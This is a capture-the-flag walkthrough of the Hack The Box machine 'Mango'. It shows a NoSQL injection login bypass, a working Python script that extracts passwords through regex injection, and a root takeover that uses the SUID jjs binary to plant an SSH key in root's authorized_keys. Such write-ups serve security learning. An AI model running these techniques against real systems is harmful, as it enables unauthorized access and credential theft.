Mango HTB

IP

10.10.10.162

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.162 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open on the machine

22,80,443

Lets run a more in-depth scan of the target

sudo nmap -sCV -p22,80,443 -oA nmap_results 10.10.10.162

results

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
| tls-alpn: 
|_  http/1.1
|_http-title: Mango | Search Base
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
Service Info: Host: 10.10.10.162; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds

we can see

• SSH is running on the target

• Both HTTP and HTTPS is running on the target

• Most likely a ubuntu machine\

• Looks like we have the domain name and a hostname name

  • mango.htb and staging-order.mango.htb we will add these to our hosts file

Lets check out Port 443 first

Looks like some kind of search engine

Lets get feroxbuster running and see if we can find anything

feroxbuster -u https://mango.htb:443 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -k -o dirs.txt

results

200      GET      216l      514w     5152c https://mango.htb/index.php
200      GET    15331l    41447w   397607c https://mango.htb/analytics.php
200      GET      216l      514w     5152c https://mango.htb/

Looking at the ssl certificate we can see the following

• we can see a email admin@mango.htb

We could test this search base for any injection attacks using sqlmap

1. first lets catch a request with burp, save the request to a file

2. run sqlmap on the request we saved

sqlmap -r r.txt --batch --force-ssl --level=5

HTTP

when we check out staging-order.mango.htb we can see a login screen

Lets bust out feroxbuster and see if we can find anything

feroxbuster -u http://staging-order.mango.htb -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -o dirs_http.txt

• Nothing interesting

Lets catch the login request with burp

Lets save this as a file and run sqlmap, we want to find if this is vulnerable to any injection type of attacks

sqlmap -r login.req --batch

• Nothing interesting

I'm going to take a guesse and say this web application utilises mongo NoSQL given the name of the box and well the pictures of the mangos

Lets run with this so first we need to check if this is indeed vulnerable to an injection attack

here is a blog that explains this better then i could

NoSQL Unveiled: Vulnerabilities & InjectionMedium

alright we have a request of the login in burp we send that over to repeater

Now what we can do to bypass authentication is the following

notice the [$ne] , this is a common operator within NoSQL meaning 'not equal to' now we are essentially saying

• username is not equal to 'shrek123'

• password is not equal to 'shrek123'

because both of these statements are true, we are authenticated to the page

• not much here

since we know we have a injection point within the login prompt, maybe we can dump some passwords

we can utilise the $regex filter

for example we can see if the first letter of the user admin's password is x

username=username&password[$regex]=^x.*&login=login

Now lets create a python script to brute force the usernames and passwords

import sys
import string
import requests

class MangoBruteForcer:
    def __init__(self, url):
        #Constructor to initialize the class with the target URL
        self.url = url

    def brute_password(self, user):
        #Function to brute force the password for a given username
        password = ""
        while True:
            #Iterate over each character in the ASCII letters, digits and punctuations
            for c in string.ascii_letters + string.digits + string.punctuation:
                #Skip apecial characters that may interfere with the URL
                if c in ["*", "+", ".", "?", "|", "\\"]:
                    continue
                #Display the current password attempt in the console
                sys.stdout.write(f"\r[+] Password: {password}{c}")
                sys.stdout.flush()
                #Send a POST request to the target URL with the current username and password regex
                resp = requests.post(
                    self.url,
                    data={
                        "username": user,
                        "password[$regex]": f"^{password}{c}.*",
                        "login": "login",
                    },
                )
                # Check if the response indicates a successful login attempt
                if "We just started farming!" in resp.text:
                    # If successful, update the password and make a final login attempt
                    password += c
                    resp = requests.post(
                        self.url,
                        data={"username": user, "password": password, "login": "login"},
                    )
                    #Check if the final login attempt is successful
                    if "We just started farming!" in resp.text:
                        #Print the found password and return from the function
                        print(f"\r[+] Found password for {user}: {password.ljust(20)}")
                        return

    def brute_user(self, res):
         # Function to brute-force the username and call brute_password on each attempt
        found = False
        for c in string.ascii_letters + string.digits:
            # Display the current username attempt to the console
            sys.stdout.write(f"\r[*] Trying Username: {res}{c.ljust(20)}")
            sys.stdout.flush()
             # Send a POST request to the target URL with the current username regex
            resp = requests.post(
                self.url,
                data={
                    "username[$regex]": f"^{res}{c}",
                    "password[$gt]": "",
                    "login": "login",
                },
            )
              # Check if the response indicates a successful username attempt
            if "We just started farming!" in resp.text:
                found = True
                self.brute_user(res + c)
        if not found:
            print(f"\r[+] Found user: {res.ljust(20)}")
            self.brute_password(res)

if __name__ == "__main__":
    try:
        target_url = "http://staging-order.mango.htb/"
        brute_forcer = MangoBruteForcer(target_url)
        initial_user = ""
        brute_forcer.brute_user(initial_user)
    except Exception as e:
        print(f"Error: {e}")

Now Lets run this script

we have 2 users and associated password

[+] Found user: admin                         
[+] Found password for admin: t9KcS3>!0B#2        
[+] Found user: mango                         
[+] Found password for mango: h3mXK8RhU~f{]f5H    
[*] Trying Username: 9  

Lets see if we can ssh into the machine'

ssh mango@10.10.10.162

we have a SSH session as mango

if we look within the home directory we can see both admin and mango

Lets see if we can switch our user to admin, using the admin password we found

su admin

we are admin, but we dont have sudo privileges on the machine

When we search for SUID files, we can see the following

find / -type f -perm /4000 2>/dev/null

we do find something interesting

• /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

what we can do is write to a file (/root/.ssh/authroized_keys) and drop a SSH key into the file and ssh in as root, to do this

1. Let's generate some keys

mkdir .ssh
ssh-keygen

1. Lets create a exploit script using the knowledge from gtfobins

• copy the location of the authorized_keys file /root/.ssh/authorized_keys

• copy our public key so it can be written to authorized_keys

echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDlS7FNv4N/P3/iUoWjOi/35AK8dXaDiS/Aq9S8h3nmdiYCIl0FOCWu1npPKN/mfzs3rtTtuk3AjMFsVByrpJpWcH77zpe72z/ZTA2Pn3ZHW5PjZYWJ9QvE9PiinIPAC4kt7H9DpRiu37mN+HWpB0g6OMHMLQWNYKcou7rhLnn1eNhB4rCOUvCG2jTTNt0muYzAPZ3LB1TNI0eWVZBevAlXIXrlpeCGmWAzxT+lcTHD7a7zbYg/EMeeKwk3KDfQy83C9yOUDYM6d8IVV75avly49bFt/SOJyqLXo2WXeRXEyOQvOqIi3LoiuP6JR6EdQtX4FRA38ECs+DnEObW/1tIaR3AATM1T23mdmBNnAr9ZJzwFlBkILXX4HQnmzfDTrbBwEj3lgGBKDZp80dU7yUjrs1jkVOhaD34qbeX+ARzyAQwP9LRnVmyNoBH2oCaDs0suchmisvNm/wqfcjkEUSeBQ/HUiRsUbnxUZB6a7HrKiSVP6ap3RCP3gTPn3xT5F/k=");
fw.close();' | jjs

copy and past the exploit in our SSH session

1. Lets give our private key the necessary permissions and SSH into the machine as root

chmod 600 id_rsa
ssh -i id_rsa root@10.10.10.162

• we are now root